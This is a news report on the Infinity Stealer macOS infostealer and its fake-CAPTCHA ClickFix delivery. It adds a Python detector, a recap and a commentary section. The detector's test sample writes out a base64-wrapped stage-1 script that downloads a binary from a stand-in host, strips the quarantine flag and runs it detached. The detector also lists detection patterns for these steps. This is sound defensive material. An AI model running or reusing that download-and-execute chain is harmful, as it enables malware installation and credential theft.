A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler.
The attack uses the ClickFix technique, presenting a fake CAPTCHA that mimics Cloudflare’s human verification check to trick users into executing malicious code.
Researchers at Malwarebytes say this is the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
Because Nuitka produces a native binary by compiling the Python script into C code, the resulting executable is more resistant to static analysis.
Compared to PyInstaller, which bundles the Python interpreter together with the script’s bytecode, a Nuitka build is more evasive because it produces a real native binary with no obvious bytecode layer, making reverse engineering much harder.
“The final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware,” Malwarebytes says.
Attack chain
The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare and asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal, bypassing OS-level defenses.
The command decodes a Bash script that writes the stage-2 (Nuitka loader) to /tmp, then removes the quarantine flag, and executes it via ‘nohup.’ Finally, it passes the command-and-control (C2) and token via environment variables and then deletes itself and closes the Terminal window.
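The stage-1 behaviour described above (a base64-wrapped command piped into a shell, a download into /tmp, the quarantine flag stripped, a detached launch via nohup, C2 details passed as environment variables, self-deletion) is exactly what a defender can pre-screen for before anything is pasted into Terminal. The following Python is an added example, not Malwarebytes’ analysis code or the malware’s own script: it unwraps base64 layers in a pasted command, flags each ClickFix-style indicator, and runs against a constructed sample that uses a reserved .invalid domain and a placeholder token.

```python
import base64
import binascii
import re

# Each indicator is (regex, explanation). They mirror the stage-1 behaviour the
# article describes; the list is a heuristic starting point, not a signature set.
INDICATORS = [
    (r"\|\s*(ba|z)?sh\b", "pipes output straight into a shell"),
    (r"\bbase64\b[^|\n]*(-d|--decode|-D)\b", "decodes a base64 blob at runtime"),
    (r"\b(curl|wget)\b[^\n]*/tmp/", "downloads a file into /tmp"),
    (r"\bxattr\s+(-d\s+com\.apple\.quarantine|-c)\b", "removes the macOS quarantine flag"),
    (r"(^|[\s;&|])nohup\s", "launches a detached background process"),
    (r"(^|\s)[A-Z_]*(C2|TOKEN)[A-Z_]*=\S+", "passes C2/token via environment variables"),
    (r"\brm\s+(-f\s+)?[\"']?\$0\b", "script deletes itself"),
]

_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_layers(command, max_depth=3):
    """Return [(depth, text)] for the command itself plus every base64 blob in it
    that decodes to readable text, recursing so nested encodings are unwrapped."""
    layers = [(0, command)]
    frontier = [command]
    for depth in range(1, max_depth + 1):
        decoded_here = []
        for text in frontier:
            for blob in _B64_BLOB.findall(text):
                try:
                    raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
                    decoded = raw.decode("utf-8")
                except (binascii.Error, UnicodeDecodeError):
                    continue  # not real base64, or binary: ignore this candidate
                if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
                    decoded_here.append(decoded)
        if not decoded_here:
            break
        layers.extend((depth, d) for d in decoded_here)
        frontier = decoded_here
    return layers


def analyze_command(command):
    """Return sorted, de-duplicated (depth, explanation) findings across all layers."""
    findings = set()
    for depth, text in decode_layers(command):
        for pattern, why in INDICATORS:
            if re.search(pattern, text, re.MULTILINE):
                findings.add((depth, why))
    return sorted(findings)


def risk_level(findings):
    """Three or more distinct indicators together is the ClickFix profile."""
    distinct = {why for _, why in findings}
    if len(distinct) >= 3:
        return "high"
    if distinct:
        return "medium"
    return "low"


# Constructed stand-in for the stage-1 script the article describes. The domain
# is a reserved .invalid name and the token is a placeholder; nothing here is
# taken from the real campaign beyond the behaviours the article lists.
SAMPLE_STAGE1 = """#!/bin/bash
curl -fsSL https://update-check.invalid/UpdateHelper -o /tmp/UpdateHelper
xattr -d com.apple.quarantine /tmp/UpdateHelper
chmod +x /tmp/UpdateHelper
C2=https://update-check.invalid TOKEN=PLACEHOLDER nohup /tmp/UpdateHelper >/dev/null 2>&1 &
rm -f "$0"
"""

# What a victim would be told to paste: the script wrapped in base64 (constructed).
SAMPLE_PASTED = (
    "echo " + base64.b64encode(SAMPLE_STAGE1.encode()).decode() + " | base64 -d | bash"
)

if __name__ == "__main__":
    results = analyze_command(SAMPLE_PASTED)
    for depth, why in results:
        print(f"layer {depth}: {why}")
    print("risk:", risk_level(results))
```

The layer index tells an analyst where each indicator sits: the pipe-to-shell and base64-decode hits are on the visible command, while the quarantine removal, nohup launch and self-deletion only appear after decoding, which is why a one-line pasted command looks harmless to the eye. The checks are heuristics; wrapping in a different encoder or a different download tool would need its own pattern, so treat a "medium" result as a prompt to decode and read the command, not as a clean bill.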
The Nuitka loader is an 8.6 MB Mach-O binary that contains a 35 MB zstd-compressed archive holding stage 3, UpdateHelper.bin, which is the Infinity Stealer malware itself.
Before starting to collect sensitive data, the malware performs anti-analysis checks to determine whether it is running in a virtualized/sandboxed environment.
Malwarebytes’ analysis of the Python 3.11 payload uncovered that the info-stealer can take screenshots and harvest the following data:
- Credentials from Chromium‑based browsers and Firefox
- macOS Keychain entries
- Cryptocurrency wallets
- Plaintext secrets in developer files, such as .env
All stolen data is exfiltrated via HTTP POST requests to the C2, and a Telegram notification is sent to the threat actors upon completion of the operation.
Malwarebytes underlines that the appearance of malware like Infinity Stealer is proof that threats to macOS users are only getting more advanced and targeted.
Users should never paste commands they find online into Terminal unless they fully understand what those commands do.
Facts Only
A new macOS malware named Infinity Stealer is targeting users with a Python payload compiled using the Nuitka compiler.
The malware uses the ClickFix technique, presenting a fake Cloudflare CAPTCHA to trick users into executing malicious code.
Malwarebytes researchers identified this as the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled via Nuitka.
The attack begins with a base64-obfuscated curl command on the domain update-check[.]com, posing as a Cloudflare human verification step.
The command decodes a Bash script that writes a Nuitka loader to /tmp, removes the quarantine flag, and executes it via ‘nohup.’
The Nuitka loader is an 8.6 MB Mach-O binary containing a 35 MB zstd-compressed archive with the final payload, UpdateHelper.bin.
The malware performs anti-analysis checks before collecting data, including browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets.
Stolen data is exfiltrated via HTTP POST requests to a command-and-control server, with a Telegram notification sent to attackers.
Malwarebytes warns that macOS threats are becoming more advanced and targeted.
Users are advised never to paste untrusted commands into Terminal.
Executive Summary
Full Take
The Infinity Stealer campaign represents a significant escalation in macOS malware sophistication, blending social engineering with advanced technical evasion. The use of ClickFix—a fake CAPTCHA—exploits user trust in familiar verification processes, while the Nuitka compiler’s native binary output complicates detection and analysis. This dual approach underscores a broader trend: attackers are increasingly combining psychological manipulation with technical obfuscation to bypass defenses. The malware’s focus on cryptocurrency wallets and developer secrets suggests a targeted effort to exploit high-value assets, aligning with the growing professionalization of cybercrime.
**Steelman:** The strongest aspect of this narrative is its clear documentation of a novel attack vector. By detailing the technical chain—from ClickFix lure to Nuitka compilation—it provides actionable intelligence for defenders. The warning against blindly pasting Terminal commands is a critical reminder of user agency in security.
**Pattern Scan:** The attack leverages *ARC-0012 Trust Exploitation* (abusing familiarity with Cloudflare’s CAPTCHA) and *ARC-0034 Technical Obfuscation* (Nuitka’s native binary to evade analysis). The base64-obfuscated command and self-deleting script also align with *ARC-0041 Evasion Tactics*.
**Root Cause:** The paradigm here is the assumption that macOS users are inherently safer than Windows users—a myth that attackers are actively dismantling. The unstated assumption is that users will comply with social engineering prompts without scrutiny, a vulnerability exacerbated by the normalization of CAPTCHAs.
**Implications:** For human agency, this highlights the tension between convenience and security. Users face a cognitive burden: verifying every Terminal command is impractical, yet blind trust is exploitable. The second-order consequence is a potential erosion of trust in legitimate verification systems, as attackers weaponize their ubiquity.
**Bridge Questions:** How might defenders adapt to malware that blends social engineering with advanced compilation techniques? What role should platform vendors play in mitigating risks from tools like Nuitka, which have legitimate uses but are weaponized here? Would stricter Terminal warnings reduce efficacy without alienating users?
**Counterstrike Scan:** A coordinated influence campaign would amplify fear of macOS vulnerabilities while downplaying mitigation strategies (e.g., "macOS is now as unsafe as Windows"). The actual content avoids this, focusing on technical details and user education—a healthy alignment with defensive goals.
Sentinel — Human
The text appears to be written by a human. While there are some indications of variable sentence length and coherence suggesting AI involvement, the overall structure, emphasis, and voice indicate human authorship.
